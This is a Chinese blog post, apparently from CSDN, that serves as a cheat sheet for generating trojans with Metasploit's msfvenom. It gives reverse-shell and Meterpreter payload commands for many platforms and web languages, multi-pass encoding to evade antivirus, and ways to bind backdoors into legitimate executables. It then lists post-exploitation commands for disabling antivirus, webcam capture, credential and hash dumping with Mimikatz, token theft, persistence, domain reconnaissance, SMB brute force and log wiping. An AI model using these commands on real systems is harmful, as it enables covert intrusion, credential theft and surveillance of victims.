msf生成木马

最新推荐文章于 2024-08-31 23:25:14 发布
最新推荐文章于 2024-08-31 23:25:14 发布
阅读量1.4w 收藏 105
点赞数 8
文章标签: 安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liu_jia_liang/article/details/123661388
版权

Linux

  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

 msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads

PHP

  msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

 msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads

Python

  msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

  msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

  msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

接受反弹:

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp 

set LHOST 192.168.17.135

set LPORT 7001

exploit

具体使用:

生成木马:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.17.135 LPORT=7001 --platform win -f exe -o /54320.exe

监控:

nc -l -p 7001

或者:

msfconsole
use exploit/multi/handler
//set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.17.135
set LPORT 7001
exploit

 此时可以已经连接上了msf的马了,执行命令了

 

如若,想要利用msf的其他的扫描模块,则直接输入:background

 

msf即Metasploit Framework,可以用来漏洞利用。漏洞探测等功能,是一个非常好的工具

是一个框架,可以改动
 

-msfvenom -p windows/shell_reverse_tcp lhost=192.168.33.135 lport=7001 -a x86 --platform win -f exe -o a.exe

-p 指定payload路径
lhost=1.1.1.1 lport=4444 //
-a x86 //操作系统的架构
--platform win //平台,win是windows 平台
-f exe //输出格式,这里是exe格式输出
-o //输出的名字

加密生成shell

msfvenom -p windows/shell/bind_tcp lhost=192.168.17.135 lport=7001 -f raw -e
x86/shikata_ga_nai -i 6 | msfvenom -a x86 --platform windows -e x86/
countdown -i 7 -f raw | msfvenom -a x86 --platform windows -e x86/
shikata_ga_nai -i 9 -b '\x00' -f exe -o b.exe

-f raw 以原始的模式输出
-e 接加密编码模块 -i 接数字加密多少次 | ....再次加密
-b ‘\xoo’ 把\xoo特色字符处理掉

generate -b '\x00\xff' -f exe -o /home/1.exe


把后门绑定在其他模板上:-x
 

msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.17.135 lport=7001 -arch x86 --platform win -f exe -o c.exe

 直接在linux上运行下面命令生成木马

普通反弹tcp(shell_reverse_tcp):

msfvenom -p windows/shell_reverse_tcp lhost=192.168.17.135 lport=7001 --platform win -f exe -o /home/kali/Desktop/5432.exe

利用:可以直接用nc连接,或者msf不用设payload

利用反弹meterpreter_tcp/http:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.17.135  lport=7001--platform win -f exe -o /home/kali/Desktop/54320.exe

使用加密:

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.17.135   lport=7001 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b '\x00' -f exe -o /home/kali/Desktop/meter_http_msfjiami_54322

加密绑定文件(有时候文件无法正常使用):

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.17.135 lport=7001-f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b '\x00' -k-x /home/kali/Desktop/key.exe -f exe -o /home/kali/Desktop/54322_key_http_msfjiami.exe
msfvenom -p windows/meterpreter/reverse_http lhost=192.168.17.135  lport=7001-f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 15 -f csharp -o /home/kali/Desktop/yuanma.txt

不加密绑定文件:

msfvenom -p windows/meterpreter/reverse_http -k-x /home/kali/Desktop/bing.exe lhost=192.168.17.135 lport=7001--platform win -f exe -o /home/kali/Desktop/54322_bing.exe

生成源码:

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.17.135  lport=7001-f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 15 -f csharp -o /home/kali/Desktop/yuanma.txt

  msf获取session后的操作       参考:msf 获取session 之后 - 胖丫丶 - 博客园

进程迁移:
    ps   获取进程
    getpid  shell的进程号
    migrate  迁移
    run post/windows/manage/migrate     自动迁移


shell之后:
    sysinfo 获取系统信息
    run post/windows/gather/checkvm        查看目标是否允许在虚拟机
    idletime        最近运行的时间
    route        查看目录完整网络
    getuid        当前用户名
    run post/windows/manage/killav        关闭杀毒软件
    run post/windows/manage/enable_rdp    开启3389
    run post/windows/manage/autoroute    目标子网情况
    background    隐藏后台
    route add    添加路由
    route    print查看
    run post/windows/gather/enum_logged_on_users    列举当前有多少用户登录过目标主机
    run post/windows/gather/enum_applocations        列举安装在目标主机上
    run post/windows/gather/credentials/windows_autologin    抓取自动登录的用户名密码
    load espia   screengrad    抓取此时屏幕截图
    webcam_list    有无摄像头
    webcam_snap    拍照
    webcam_stream    开启直播模式
    shell 进入目标shell
文件系统命令:
    pwd或getwd    目标主机当前处于哪个目录
    getlwd    自己处于哪个目录
    search -f *.txt -d c:\    搜索c盘下所有txt文件
    download    c:\test.txt /root 下载到本机
    upload    /root/text.txt c:    上传

权限提升:
    whoami/groups    查看当前权限
    getuid    查看当前权限
    getsystem    尝试提权
    systeminfo    查看补丁
    使用wmic    列出安装的补丁
令牌窃取:
    use incognito
    list_token -u 列出token
    impersonate_token  +上述列出的有效令牌    假冒令牌攻击(需要两个\\)
    成功后运行shell

Hash攻击:
    1.使用hashdump 抓取密码
    非SYSTEM运行时会失败
    run windows/gather/smart_hashdump    导出域所有用户(windows7.开启UAC会导致失败)
    2.Quarks    PwDump
    3.windows credentials Editor(WCE)
        上传wce到目标。找到文件 wce -w
    4.Mimikatz(管理员)
    load Mimikatz       加载    
    msv        抓取Hash
    kerberos    抓取系统票据
    wdigest        获取系统账户信息
    mimikatz_command -f samdump::hashed    抓取hash
    mimikatz_command -f handle::list  查看进程
    mimikatz_command -f service::list  windows 服务
    mimikatz_command -f crypto::listProviders  查看系统证书
    支持PowerShell调用(Invoke-Mimikatz)

后门:
    1.Cymothoa:
        cymothoa -p 982 -s 1 -y 4444    选择PID为982的进程为宿主进程,使用第一类Shellcode,指定反弹端口4444
        nc -nvv 目标主机 4444    使用nc进行连接
    2.Persistence:
        run persistence -A -S -U -i 60 -p 4321 -r 目标主机
            A :自动启动payload程序
            S :系统启动时自动加载
            U :用户登录时自动启动
            X :开机时自动加载
            i :回连的时间间隔
            P :监听反向连接端口号
            r :目标主机
Web 后门:
    msf中使用generate生成

内网渗透:
    信息收集:
        net user /domain : 查看域用户
        net view /domain :    查看有几个域
        net    view /domain :xxx    查看域内主机
        net group /domain  : 查看域里面的组
        net group "domain computers" /domain 查看域内所有的主机名
        net group "domain admins " /domain 查看域管理员
        net group "domain controllers" /domain 查看域控制器
        net group "enterprise admins" /domain 查看企业管理器
        nettime /domain 查看时间服务器

    PowerShell 寻找域管在线服务
    获取域管理权
    登录域控制:使用msf中的PsExec 反弹Meterpreter

SMB爆破内网:
    先添加路由
    然后使用smb_login 或psexec_scanner
    route add 
    creds

清理日志:
    删除所有用户
    clearev    删除日志

L_DC
关注
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3742
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马、一句话变形技巧和使用...
weixin_36005427的博客
03-27 1951
:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大),一般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用:Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...
Metasploit(msf)系列-木马生成
热门推荐
chaojixiaojingang
09-28 3万+
原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。 msfvenom命令行选项如下: Options:     -p, --payload    &lt;payload&gt;       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&amp;#039;-&amp;#039;或者s...
003-MSF恶程木马+cs上线
最新发布
qq_57017823的博客
08-31 276
msfvenom,钓鱼攻击,键盘监听
【网络安全MSF生成木马教程
一直被模仿,从未被超越
03-13 1562
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
【网络安全MSF生成木马教程,网络安全框架
2401_84240742的博客
04-11 1370
3、免杀加壳:本例用的是 Themida。
【内网安全】——msf木马生成教程
Demo不是emo的博客
01-30 5546
msfvenom生成木马教程
2024年网络安全最新【网络安全MSF生成木马教程
2401_84281712的博客
05-03 334
这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**2、查看权限,当客户机是普通用户登录的话,此时获取到的就是一个普通 user 权限。1、当出现 meterpreter,表示成功入侵。2、设置Payload。
MSF生成木马渗透WIN7
妖魔鬼怪快离开的博客
11-15 5446
生成木马 使用msf模块中的msfvenom模块,生成.exe木马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机IP地址 LPORT=4444 -f exe > /home/tim/桌面/qq.exe 启动msfconsole msfconsole 设置payload参数 //开启监听· use exploit/multi/handler //设置tcp监听 set payload windows/meterpreter/rev
利用msf框架生成常见的木马
weixin_42035825的博客
03-23 1843
常用木马 安卓app msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -o test.apk Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -f elf>shell.elf Mac: msfvenom -p osx/x...
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 9247
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
msf生成免杀木马
qq_56426046的博客
09-08 5711
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 7186
生成木马进行植入
利用msfvenom制作windows木马及免杀
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马msfvenom -a x86 --platform window...
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 4623
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
msf生成简单木马
qq_44881113的博客
09-04 331
windows 木马 msfvenom -p windows/meterpreter/reverse_http lhost=192.168.1.128 lport=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f exe>shell.exe 监听 msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_http s
Msfvenom生成木马实验
m0_74025111的博客
04-24 1183
编码处理型:msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>/root/Desktop /putty.exe -k -f exe -o /tmp/putty_evil.exe生成伪装木马,将payload。
Metasploit(msf)木马生成
m0_58713554的博客
11-04 328
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击端ip LPORT=1234 -f exe > /root/新建文件的文件名.exe 2 ls 查看是否创建出了该文件 3 然后进入msfconsole进行监听 4 use exploit/multi/handler 进入监听模式 5 set PAYLOAD set LHOST攻击机ip set LPORT 配置参数 6 run 运行 7 把刚...
msf生成linux木马
03-16
MSF是Metasploit Framework的缩写,是一款常用的渗透测试工具。要生成Linux木马,可以使用MSF中的payload生成器来创建一个适合Linux系统的payload,然后使用MSF中的exploit模块来利用漏洞,将payload注入到目标系统中,从而实现远程控制。具体操作可以参考MSF的官方文档或相关教程。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值